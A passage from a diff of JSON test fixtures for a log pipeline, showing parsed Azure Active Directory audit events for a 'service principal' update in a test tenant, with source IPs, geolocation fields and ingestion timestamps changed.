lue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15461,25 +14129,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15493,7 +14143,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15616,7 +14266,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -15628,12 +14278,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036498500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\
":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125272Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value
\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15659,25 +14309,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15691,7 +14323,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15814,7 +14446,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -15826,12 +14458,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036502800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\
":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125277700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Va
lue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -15857,25 +14489,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -15889,7 +14503,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -16003,7 +14617,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
